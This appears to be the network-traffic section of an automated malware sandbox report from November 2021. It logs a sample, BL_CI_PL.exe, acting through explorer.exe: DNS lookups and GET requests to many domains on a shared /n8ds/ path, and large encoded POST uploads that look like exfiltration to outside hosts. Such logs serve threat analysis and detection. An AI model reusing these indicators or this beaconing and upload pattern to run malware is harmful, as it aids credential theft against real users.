                                                                                                                                                    Nov 29, 2021 14:10:11.976008892 CET192.168.11.201.1.1.10xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:12.273547888 CET192.168.11.209.9.9.90xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:12.273586988 CET192.168.11.209.9.9.90xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:29.331868887 CET192.168.11.201.1.1.10x9bd1Standard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:34.377741098 CET192.168.11.201.1.1.10x9f58Standard query (0)www.yghdlhax.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:39.892662048 CET192.168.11.201.1.1.10xe980Standard query (0)www.littlefishth.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:45.048165083 CET192.168.11.201.1.1.10x8c3dStandard query (0)www.csenmoga.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:50.093056917 CET192.168.11.201.1.1.10x7c4dStandard query (0)www.growebox.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:55.810662031 CET192.168.11.201.1.1.10xff0aStandard query (0)www.32342231.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:00.857038021 CET192.168.11.201.1.1.10xdffdStandard query (0)www.topwowshopping.storeA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:11.713496923 CET192.168.11.201.1.1.10xf5d1Standard query (0)www.recoverytrivia.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:32.818710089 CET192.168.11.201.1.1.10x16d7Standard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:52.360733032 CET192.168.11.201.1.1.10x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:52.578974962 CET192.168.11.209.9.9.90x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:53.594285011 CET192.168.11.201.1.1.10x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.609416962 CET192.168.11.209.9.9.90x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.609427929 CET192.168.11.201.1.1.10x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.829699039 CET192.168.11.209.9.9.90x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:09.684891939 CET192.168.11.201.1.1.10xc6fbStandard query (0)www.divorcefearfreedom.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:14.871531010 CET192.168.11.201.1.1.10x23a3Standard query (0)www.reliablehomesellers.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:20.245069981 CET192.168.11.201.1.1.10xeeeaStandard query (0)www.jobl.spaceA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:25.353204012 CET192.168.11.201.1.1.10x1b33Standard query (0)www.testwebsite0711.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:30.383773088 CET192.168.11.201.1.1.10xaa17Standard query (0)www.dif-directory.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:40.709778070 CET192.168.11.201.1.1.10x2a8Standard query (0)www.32342231.xyzA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers


                                                                                                                                                    HTTP Request Dependency Graph


                                                                                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49807 | 20.124.109.2 | 443 | C:\Users\user\Desktop\BL_CI_PL.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49842 | 20.124.109.2 | 443 | C:\Users\user\Desktop\BL_CI_PL.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.11.20 | 49820 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:08:05.169428110 CET | 6429 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1
Host: www.mummymotors.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:08:05.340312958 CET | 6429 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 29 Nov 2021 13:08:05 GMT
Content-Type: text/html
Content-Length: 275
ETag: "61973ffe-113"
Via: 1.1 google
Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.11.20 | 49821 | 34.237.47.210 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:08:30.765151024 CET | 6431 | OUT | GET /n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF HTTP/1.1
Host: www.fatima2021.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:08:30.895956993 CET | 6431 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 29 Nov 2021 13:08:30 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.fatima2021.com/n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.11.20 | 49823 | 192.0.78.24 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:08:40.962162971 CET | 6439 | OUT | GET /n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF HTTP/1.1
Host: www.talkingpoint.tours
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:08:40.971302986 CET | 6439 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 29 Nov 2021 13:08:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.talkingpoint.tours/n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF
X-ac: 2.hhn _dca
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.11.20 | 49824 | 203.170.80.250 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:08:46.448832035 CET | 6440 | OUT | GET /n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF HTTP/1.1
Host: www.mackthetruck.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.11.20 | 49825 | 136.143.191.204 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:08:52.261940002 CET | 6441 | OUT | GET /n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaF HTTP/1.1
Host: www.unitedmetal-saudi.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:08:52.430764914 CET | 6442 | IN | HTTP/1.1 404
Server: ZGS
Date: Mon, 29 Nov 2021 13:08:52 GMT
Content-Type: text/html
Content-Length: 4657
Connection: close
Set-Cookie: 0cea9df7db=9a53152e40f8a6327f1486af29c1a1cb; Path=/
X-XSS-Protection: 1
Set-Cookie: csrfc=30953e0c-66f0-4339-b67b-4a368c0a1549;path=/;priority=high
Set-Cookie: _zcsr_tmp=30953e0c-66f0-4339-b67b-4a368c0a1549;path=/;SameSite=Strict;priority=high
Pragma: no-cache
Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: accept-encoding
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Nov 29, 2021 14:08:52.430877924 CET | 6444 | IN | Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Nov 29, 2021 14:08:52.430958986 CET | 6445 | IN | Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
Nov 29, 2021 14:08:52.431011915 CET | 6446 | IN | Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.11.20 | 49826 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:09:02.706785917 CET | 6448 | OUT | GET /n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaF HTTP/1.1
Host: www.palmasdelmarcondos.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:09:02.814063072 CET | 6449 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 29 Nov 2021 13:09:02 GMT
Content-Type: text/html
Content-Length: 275
ETag: "618be735-113"
Via: 1.1 google
Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    16192.168.11.2049827216.172.172.8780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:18.060452938 CET6450OUTGET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.dietatrintadias.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:09:18.201647043 CET | 6451 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:18 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 2361
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
Nov 29, 2021 14:09:18.201736927 CET | 6452 | IN | Data Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                                                                                                                    Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.11.20 | 49828 | 88.99.22.5 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:09:23.221726894 CET | 6453 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1
                                                                                                                                                    Host: www.helpcloud.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:09:23.236248016 CET | 6454 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:23 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 178
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.helpcloud.xyz:443/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.11.20 | 49829 | 172.120.157.187 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:09:28.412970066 CET | 6454 | OUT | GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.stylesbykee.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:09:28.576642036 CET | 6455 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:24 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 801
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.11.20 | 49830 | 66.29.140.185 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:09:39.069895983 CET | 6456 | OUT | GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.lopsrental.lease
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:09:39.330734968 CET | 6457 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:39 GMT
                                                                                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                    Content-Length: 282
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.11.20 | 49845 | 20.124.109.2 | 443 | C:\Users\user\Desktop\BL_CI_PL.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.11.20 | 49831 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:09:58.819690943 CET | 6460 | OUT | POST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.mummymotors.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.mummymotors.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Ascii: 73uTeM0EeN1k1qfV-~VCS(UTfMSCo3X7d6cFfYB3bN2V6jxpwllAfndKXpSlu6hINGWdhFGZWPo2WfYj7ABIjnz7L~f0s8YjQSCeBodyyKMpdrkzHS41etuoD7SvihIQFpFaq1cEaFROofIOTPqmh1quDkG(jOvJpj-b4zRzTlg9_b32I5dfnaiYjUwDpmmFfGlc4UYwdVYuSLXLCPS(gZhGcxQpTSFfeyR4Q4PVVUx5IrVZzT_
                                                                                                                                                    Nov 29, 2021 14:09:58.831584930 CET6482OUTData Raw: 55 56 53 49 62 6c 56 78 34 7e 30 75 61 4a 6a 4b 65 51 6b 52 65 36 5a 50 6a 65 4b 6a 7a 4b 55 6e 76 53 76 71 41 28 7a 71 6d 39 34 54 58 49 4c 6d 4b 48 75 6a 6a 43 78 62 6a 37 45 28 37 70 76 74 36 7e 65 76 72 68 5f 58 67 78 4b 69 70 75 44 46 49 50
                                                                                                                                                    Data Ascii: UVSIblVx4~0uaJjKeQkRe6ZPjeKjzKUnvSvqA(zqm94TXILmKHujjCxbj7E(7pvt6~evrh_XgxKipuDFIP4XI5m2KxHhvoAkC6O0fqWbyskxVzoYiknUfNxWPLEuSyfXG3zWeCKaOEkOUQpNX4HreqvUMtw3CEfOToekEXc(OWOSeu9dv7Jz33432CLft8x3sTE21cM0q8g~AOWAkMLONWgkVcJzeHiMs7dEpfQJTWWZwymDKiH
                                                                                                                                                    Nov 29, 2021 14:09:58.831764936 CET6485OUTData Raw: 48 4c 4e 4f 33 28 6a 63 6b 48 63 59 62 78 51 77 72 50 65 63 34 4e 48 49 65 59 64 69 39 6e 75 65 78 66 39 34 70 56 61 44 78 50 6d 64 71 6d 75 71 78 79 51 75 37 73 35 6d 5a 75 42 69 39 52 48 35 37 37 64 53 63 32 37 6f 36 6d 56 6c 46 72 64 36 70 39
                                                                                                                                                    Data Ascii: HLNO3(jckHcYbxQwrPec4NHIeYdi9nuexf94pVaDxPmdqmuqxyQu7s5mZuBi9RH577dSc27o6mVlFrd6p972plbcBjYIZ1gEBrgwTCJG1gMgQq0XtmoES4GE0oeYFo-5MH7iz5sRKSDp8NP(spQKAfHNjdjsInz7JN73_~ipNpa5uX_2-Ond_QTVYbtMobwpnE2E6dLs7oLSvv0NXrqezAbcfCv3HgzXZJT6II2x8JGzBdxGWk3
                                                                                                                                                    Nov 29, 2021 14:09:58.831907034 CET6495OUTData Raw: 4f 46 67 66 6c 50 67 63 34 57 5a 4b 74 34 36 6d 4b 7a 44 30 6b 58 51 47 7a 46 49 64 56 78 62 75 39 58 69 68 72 32 56 6b 6d 6c 72 7a 55 37 62 57 32 6f 56 4e 4c 75 58 56 46 36 62 75 34 48 78 44 54 55 67 4c 63 6a 58 37 45 43 36 43 6d 56 65 42 7a 74
                                                                                                                                                    Data Ascii: OFgflPgc4WZKt46mKzD0kXQGzFIdVxbu9Xihr2VkmlrzU7bW2oVNLuXVF6bu4HxDTUgLcjX7EC6CmVeBztMVmZLlOnYAFMvojMQVItAFms3yHVpYw5LPkOhGlFDHEyyQ2lszXhKsIswI_cu~KCxJgIfW7Qln7MxjPQwI9OwumkoHb0UTkXABFdHpUKKfaxHFNlAExbKZsJTQd~WBq0j91m1MlM0CGOanOmBUL6KMmpUVKLZp-6q
                                                                                                                                                    Nov 29, 2021 14:09:58.832087040 CET6497OUTData Raw: 31 33 61 4e 61 76 47 73 55 6b 70 74 42 53 7a 4e 71 33 4a 77 44 58 77 74 55 72 75 46 58 7a 4e 50 53 61 70 47 30 4f 77 36 69 59 67 74 63 6b 73 51 74 75 57 33 4e 63 5a 44 4a 30 45 67 33 70 68 76 4c 52 55 72 7a 56 53 68 55 66 71 70 43 67 42 4d 65 48
                                                                                                                                                    Data Ascii: 13aNavGsUkptBSzNq3JwDXwtUruFXzNPSapG0Ow6iYgtcksQtuW3NcZDJ0Eg3phvLRUrzVShUfqpCgBMeHbOC135l0cePHV6guzX4HHQpoQGFidOyI737cJF77GUko5hILGJ_UoqXF1ao5SYD0iGLr72tQqLfm5NcuvrlpjKv4xBhQdnpATz-1-tn(vr6dX(Rsa8P22GsDj6HpOlEOqWMorSBkwOdGxGCLcdEbKKhS1n74Bw_lY
                                                                                                                                                    Nov 29, 2021 14:09:58.840826988 CET6498OUTData Raw: 45 61 63 64 7a 58 74 6b 6e 51 79 4b 48 4e 67 62 6c 58 78 52 4d 41 42 64 42 6d 69 4e 74 59 34 36 71 61 45 4d 65 47 2d 42 4e 6e 45 47 78 78 71 4d 70 59 52 58 42 79 5f 70 42 48 30 68 41 69 32 66 77 53 33 56 38 46 76 4c 55 55 33 39 77 70 39 71 76 44
                                                                                                                                                    Data Ascii: EacdzXtknQyKHNgblXxRMABdBmiNtY46qaEMeG-BNnEGxxqMpYRXBy_pBH0hAi2fwS3V8FvLUU39wp9qvDwhAaASfKGKkbq8Jjvct4xxDnrGtR5tdqAwIWyXpzdU-ElasdkIoW_yUSH79gfZEF9lcsyTdTGbU4SEprfdZAwGYFTRbkmo7lbQB0f2q~pRgpQKfvemBoXpBBwnHx7cjZxnxRdCCTg4QmHpHzdrkrH3tMfA_zysetR
                                                                                                                                                    Nov 29, 2021 14:09:58.842952013 CET6500OUTData Raw: 42 77 56 41 64 31 34 78 54 5a 58 28 55 43 6a 68 36 51 32 6d 2d 62 35 5a 30 49 43 63 4b 6f 39 28 52 59 72 6e 4a 28 45 70 32 51 49 72 42 7a 39 32 59 47 55 53 7a 61 77 6d 5f 49 30 56 63 50 31 7a 47 57 48 58 46 55 6e 6e 69 32 63 35 4d 6b 73 66 38 50
                                                                                                                                                    Data Ascii: BwVAd14xTZX(UCjh6Q2m-b5Z0ICcKo9(RYrnJ(Ep2QIrBz92YGUSzawm_I0VcP1zGWHXFUnni2c5Mksf8P6D_ykNXQsZr14BEN40OUxNgm6qL~Mes92iPgjWdxc6Zddnga_qLI-XCaSQBRgcCvwviUXq8vkgxJPfvc0tZWBcZsFSptgEGm46fKhHQ(mtkwOG_7TQtgwx8ynFBQa2uD_bHVIGEvky-UjpBLHZuzypVDNhSd9mZx4
Nov 29, 2021 14:09:58.995028973 CET | 6595 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:58 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 154
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DoZgPSk10aaiHf3kie/1tYxoMNLDLxmpbn0+w5n3KsKZrXQPAWaITkbhtz7G0bj3OzLqNxbyMokA2LYq0WCz7A
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.11.20 | 49832 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:09:58.830039978 CET | 6479 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:09:58.937305927 CET | 6594 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:58 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "6192576c-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.11.20 | 49834 | 192.64.119.254 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:10:34.554991961 CET | 6617 | OUT | POST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.yghdlhax.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.yghdlhax.xyz
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.yghdlhax.xyz/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate


